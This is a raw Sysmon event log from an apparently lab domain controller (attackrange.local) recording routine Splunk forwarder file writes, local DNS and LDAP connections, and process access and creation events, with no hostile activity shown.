13:55:48.368{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C7E964CABA85753C94847158E445D720,SHA256=6985BC9473B25891EB65812CE4A88EEDA7DC6290C55A7BCA8B40896C99B6438C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200898Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:49.399{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78FE0D8FD51EC6A1B70ABFD5BDBC1CBD,SHA256=E2573F75CB7D55A5B1FC01F5F0EE7D76546D973A0464738B9E0515BFA2D0377F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200899Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:50.415{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D5812CE5B5BFBBA219D707F6345753E,SHA256=41D11D71E2DC6D7EA61957852A3857C50D2EC900D4AB4882E3B0C4528F9A42FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200900Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:51.430{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A4A6791CD1359ABB0C8D59E51497726,SHA256=5766EBCA5D0B5655FAD403CB989511BAA2B7E970736BBC79739C603EA305D697,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200902Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:52.430{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB3FFFED75A218C6A552CE36A6660B75,SHA256=C84F163351D170A912620F18E4258495F3ED5FEA12B1592F3E2B11CDCF3A42B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200901Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:52.227{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E977B827D0FC7F050E41015919A928DF,SHA256=BCC9B0EC08EEBDBED2D29D03027B88E0B4B9AE62BD91DF9BDAC20A04436C9907,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200904Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:53.462{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56EFF3B4DA195D674FA7CC47BEC2C226,SHA256=A214035351DFF4C131AF61FCF4BBFDC3C1F509F0578C5E07A6F13CBF24BAF07B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200903Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:48.971{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55170-false10.0.1.12-8000- 23542300x80000000000000002200905Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:54.493{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=105238E4313A6A3E2917CCF4671DE0DF,SHA256=57E6FFD6EBECCCCAEB1DDF116D3643A320AA0A0B0169A8E9637E2DCA8A7F49FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200907Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:55.493{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEE9ED6AAEEDD73C47280310813FB6C3,SHA256=FF3942AA72235B0775EAF4D51F4348E54D94ED266DB74B63C7A2565E40255C1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200906Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:55.430{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=80AC6A214928D0AE45EDDFC7241EF5E4,SHA256=DB0549C5D16685683F229C19DB2C31ACA1D6A207FC9CFFBF3F2119AE42E5B9E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200909Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:56.540{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46788F6B6A7FE9DFEC974AD7BAF0B654,SHA256=FECA2BA3EB104DFFF1F43863BDF3C276EF95A49EF6EE18556B361D98EA576896,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200908Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:52.033{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53641- 23542300x80000000000000002200912Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:57.571{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6A6944D7C76E190B9C467AA4DCA0AAD,SHA256=F289B11AF1B1FB86D7ED6182BB24BC249F4D3B31E99FF2CF0AD5247F7D7EB4CA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200911Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:53.032{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53641- 23542300x80000000000000002200910Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:57.087{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1AB4B35FA37D8FF4B24347EF58A6A76A,SHA256=A815091598C67948E3F0983990FC304758FEE0F25E053622D594DF7B332BA7BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200915Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:58.587{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88A20E33974A2CCD0181E6D2667535B3,SHA256=B4380A44C949877DAE10D108B76CCEB554541FE5BB2FE9BB661565D3CDBBB1D0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200914Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:53.830{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local55171-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 354300x80000000000000002200913Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:53.830{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local55171-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 23542300x80000000000000002200918Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:59.602{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EE2C5F161653ED58637DDA7AAC35BC4,SHA256=C6D8FAA362F190670CBB20ACA35D1F1E39144A04B347AB01895A88679450F8FA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200917Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:53.986{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55172-false10.0.1.12-8000- 23542300x80000000000000002200916Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:59.243{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2038D446AECEA5B1EB175A7A4888971A,SHA256=E602EA5FB960360E39B3EA4636BB6561849AA77A968BB0374DEA325C53AE8AA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200919Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:00.634{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=531FF95418F5D43C2F53D821A41E78EB,SHA256=B7C3EF249ED0EA0F3D3EF03646E5947D3A8EE5F2AC94AB6E6C41A989DC5695A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200920Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:01.634{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF26650B34054B1076BAC77AF96BECF5,SHA256=BD33E2DA981066FCCA643605F734791616290C17E3CF6BA82B58A2829A83781E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200938Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:02.899{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E6F2-6040-EE4D-00000000AD01}5780C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200937Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:02.899{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200936Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:02.899{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200935Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:02.899{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200934Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:02.899{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200933Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:02.899{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E6F2-6040-EE4D-00000000AD01}5780C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200932Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:02.899{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E6F2-6040-EE4D-00000000AD01}5780C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200931Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:02.900{5ABCFE62-E6F2-6040-EE4D-00000000AD01}5780C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002200930Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:02.649{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D617A7537594AB14467D22748EAE64DD,SHA256=33F8A6D39048B00B4B207F42B8D77C4E500FCD1F1CEEAC32BBCE05E3B3257C48,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200929Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:02.274{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E6F2-6040-ED4D-00000000AD01}3520C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200928Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:02.274{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200927Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:02.274{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200926Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:02.274{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200925Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:02.274{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200924Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:02.274{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E6F2-6040-ED4D-00000000AD01}3520C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200923Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:02.274{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E6F2-6040-ED4D-00000000AD01}3520C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200922Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 